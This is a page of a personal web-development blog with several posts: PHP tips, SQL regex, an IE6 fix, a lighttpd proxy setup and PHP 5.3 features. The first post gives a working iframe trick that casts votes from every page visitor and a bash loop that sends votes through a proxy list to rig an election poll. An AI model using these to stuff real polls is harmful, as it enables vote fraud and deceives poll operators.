Author Archives: Adil - Page 2

wget as a hacker tool

Posted by Adil on November 9, 2010 No comments

Few days ago some people called himself web-programmers, created a web-site where it was online voting for the parliament in my country. It was a simple system you select your region, select the candidate and vote for him. The purpose of this system was to know approximate results of the election…

One of the sites used requests by GET method. The only limit was about IP address. So, from one IP address you vote once. Many people took the URL with the request and put it to their web sites as a iframe, img, or something else. For example:
http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER

You put this on the iframe in your page

<iframe src="http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER"></iframe>

and when your page is visited automatically it’s voted for “your” candidate.

GNU has a good tool called wget for downloading files from internet(or any other network). wget has a lot of options for performing different operations while you download the files. Most important options for “voting” purposes are –proxy, this little bash script will do your job:

while read line   
do   
    export http_proxy=$line
    wget --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER"
done <proxy.list

Googling for proxy server list and copy/pasting them to proxy.list file on the current directory and then executing the script will vote for your candidate from different proxies. So, recorded IP address will be proxy IP address not yours.

Additionally if you want speed up the process by reducing your RAM and network resources you can change the script as follow:

while read line   
do   
    export http_proxy=$line
    wget --tries=1 --timeout=10 --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER" &
done <proxy.list

Another web site used POST requests. wget has an option –post-data for solving this problem

Hmmm. Using a captcha could solve the problem…

Ignoring browser commands

Posted by Adil on June 18, 2010 No comments

I have rarely encountered such situation, but for larger projects it is certainly common problem. Assume that the script performs some queries in the database (deleting / adding / editing) and during these user presses the Stop button in your browser. By this command php script completes its work, which in our case may be fraught with violations of the integrity of the database.

This problem is resolved by function ignore_user_abort ():

ignore_user_abort (true);

… Is executed queries to the database …

ignore_user_abort (false);

Original source: http://i-novice.net/poleznye-php-tryuki/

Note: Best solution for such problems is using transaction on databases

fixed position on IE6

Posted by Adil on September 18, 2009 No comments

Fixed position on xhtml elements make the elements fixed at its coordinates and it is not moved when you scroll the pages. One of popular example can be facebook panel.

#elementId {
    position:fixed;
    bottom:0;
}

An example above will make the element stayed at the bottom of page.

But there is an issue on IE6 and this can be fixed via javascript. Simply get the javascript code from here and include to your page:

<script type="text/javascript" src="fixed.js"></script>

Reference:

http://www.doxdesk.com/software/js/fixed.html

Regular expressions in SQL queries

Posted by Adil on September 14, 2009 No comments

Regular expressions are useful for parsing string, matching patterns, validating etc. If we talk about strings so, I think it’s good idea using it in SQL queries.

Let we have table users:

mysql> SELECT * FROM users;
+----+-----------+----------+----------------------+
| id | first     | last     | email                |
+----+-----------+----------+----------------------+
|  1 | John      | SMITH    | jsmith@example.az    |
|  2 | Bill      | Gates    | bgates@example.ru    |
|  3 | Steve     | Jobs     | sjobs@example.de     |
|  4 | Sylvester | Stallone | stallone@example.com |
|  5 | Chuck     | Norris   | cnorris@example.net  |
|  6 | Bruce     | Lee      | blee@example1.net    |
+----+-----------+----------+----------------------+
6 rows in set (0.00 sec)

Now we want to get users whose email ends with three-letter TLD (.com,.net,.org etc). We can do this as follows:

mysql> SELECT * FROM users WHERE email LIKE '%.___';
+----+-----------+----------+----------------------+
| id | first     | last     | email                |
+----+-----------+----------+----------------------+
|  4 | Sylvester | Stallone | stallone@example.com |
|  5 | Chuck     | Norris   | cnorris@example.net  |
|  6 | Bruce     | Lee      | blee@example1.net    |
+----+-----------+----------+----------------------+
3 rows in set (0.00 sec)

Well.

What can we do, if we need get users whose email ends with digit dot three-letter TLD(blee@example1.net)? ooops.

I’ll not lie, I don’t know how to do it with ANSI SQL and I’ll use RDBMS specific functions. This example works for MySQL:

mysql> SELECT * FROM users WHERE email REGEXP '^.+[0-9]\.[a-z]{3}$';
+----+-------+------+-------------------+
| id | first | last | email             |
+----+-------+------+-------------------+
|  6 | Bruce | Lee  | blee@example1.net |
+----+-------+------+-------------------+
1 row in set (0.00 sec)

For Oracle it will as follow:

SELECT * FROM users WHERE REGEXP_LIKE(email,'^.+[0-9]\.[a-z]{3}$')

Thanks for my co-worker Mahir for the idea

Reference:
http://www.oracle.com/technology/oramag/webcolumns/2003/techarticles/rischert_regexp_pt1.html
http://dev.mysql.com/doc/refman/5.1/en/regexp.html

phpasswd tool

Posted by Adil on September 9, 2009 No comments

This week me and my friends from Neats group made little tool for working with htpasswd files.

The main purpose of the project was to make easy to use tool for changing admin passwords on Baku State University web site administration panel.

We released the project as an open-source and it is hosted on Kenai. You can download it from http://kenai.com/projects/phpasswd

It was used extJS library for flexibility.

font-size and print “toolbar” :)

Posted by Adil on July 21, 2009 No comments

Sometimes users need to make the font size larger for easy reading the text. It happens usually in news portals or some web sites like the web site of my university www.bsu.edu.az.

And also it’s better to make the print version of the page. When saying print version it means that black text on white background without any styles and something else.

Let’s begin. Simply insert this code to your HTML page:

<script type="text/javascript" src="http://tpl.bdu.az/toolbar.js"></script>
<div style="text-align:right" id="adilToolbar">
<a href="javascript:adilTextDec('content')"><img src="http://tpl.bdu.az/images/font_size_less.png"/></a>
<a href="javascript:adilTextInc('content')"><img src="http://tpl.bdu.az/images/font_size_up.png"/></a>
<a href="javascript:adilTextPrint('content')"><img src="http://tpl.bdu.az/images/printer.png"/></a>
</div>

toolbar.js:

 
var adilTextSize = 100; // general variable for saving the current textsize by percents.
 
function adilTextInc(objid) {
	// I think to make the font size 200% larger is enough 
	if (adilTextSize <=200)	adilTextSize += 20; // increment by 20%
	document.getElementById(objid).style.fontSize = adilTextSize + '%';
}
 
function adilTextDec(objid) {
	if (adilTextSize >=80) adilTextSize -= 20; // decrement by 20%
        document.getElementById(objid).style.fontSize = adilTextSize + '%';
}
 
function adilTextPrint(objid) {
	// open new window
	var doc=window.open('','name','height=600,width=800');
 
	doc.document.write('<html><head><title>Print a page</title>');
	doc.document.write('</head><body>');
 
	// copy the content of the page
	doc.document.write(document.getElementById(objid).innerHTML);
 
	// remove out toolbar if it's there
 
	doc.document.write('<script type="text/javascript">');
	doc.document.write('try{document.getElementById(\'adilToolbar\').style.display=\'none\';}catch(e){}');
	doc.document.write('</script>');
 
	doc.document.write('</body></html>');
 
	// flush the input
	doc.document.close();
 
	// print the page
	doc.print();	
}

P.S. The button for decrement of the font-size is for eagles.

lighttpd frontend + apache backend

Posted by Adil on July 5, 2009 No comments

light_logo_170px I think you have seen such urls like static.blablabla.com on your favorite web sites. What is it?

Apache HTTPD uses more memory and CPU resources when it has more connections and this make the web site load slower. The light web servers like lighttp, nginx etc. is used to solve this problem.

I will show you how to use lighttpd as proxy to apache and seperate static content from dynamic. Let’s begin.

First of all change the apache port.

#Listen 80
Listen 81

I recommend to block the direct access to 81 port using firewall.

Actually Apache will listen to 81th port and lighttpd will listen to 80th port and lighttpd will transfer requests to apache. The connections will be held by lighttpd and apache will held only connections between lighttpd and itself.

Now restart apache:
Linux:

/etc/init.d/apache2 restart

Windows:

net stop apache2
net start apache2

Now time to install lighttpd. Follow the instructions at http://www.lighttpd.net/

Edit the configuration file lighttpd.conf in its directory.
Add the following lines:

#Redirect the hosts which will be used for dynamic content to apache
$HTTP["host"] == "blabla.com" {
  proxy.server = ("" => ( (
        "host" => "127.0.0.1",
        "port" => 81 ) )
  )
}
 
# make virtual host for static content.
$HTTP["host"] == "static.blabla.com" {
  var.server_name = "static.blabla.com"
  server.name = server_name
  server.document-root = "/srv/www/vhosts/static"
}

Make sure the following modules are enabled in lighttpd:

server.modules = (
  "mod_access",
  "mod_alias",
  "mod_redirect",
  "mod_rewrite",
  "mod_proxy",
  "mod_accesslog"
)

Save the file. Restart the lighttpd typing /etc/init.d/lighttpd restart. Enjoy.

PHP 5.3 is released

Posted by Adil on July 1, 2009 No comments

PHP-5-3-main I am happy to announce about PHP 5.3 release. Some of PHP 5.3 advantages are the followings:

namespaces (http://php.net/namespaces)
With namespace support grouping or packaging the classes will be easier and neat. As a Java and .NET lover I liked this feature very much.

anonymous functions (http://www.php.net/manual/en/functions.anonymous.php)
JavaScript fans will like it. It’s not too good idea to use anonymous functions everywhere, but, it’s very useful if write very short functions and you use only for one problem.

Late Static Bindings (http://php.net/lsb)
The feature for late binding of static methods.

Improvement on ternary operator (http://php.net/ternary)
You can leave out the middle part of ternary operator from now. The expression cond1?:expression is valid while it was not in earlier versions of PHP.

Flexibility in php.ini (http://www.php.net/manual/en/ini.sections.php)
You can define the settings depending on the PATH or HOST where the script will run.

MySQL native drivers (http://php.net/mysqli.mysqlnd)
You don’t need to install MySQL Client for being able to work with remote MySQL. The PHP’s mysql driver is enough.

Hmmm. I will be waiting for Zend Framework and Zend Server optimized for PHP 5.3

« Previous page

Adil's blog

Blog about web-development.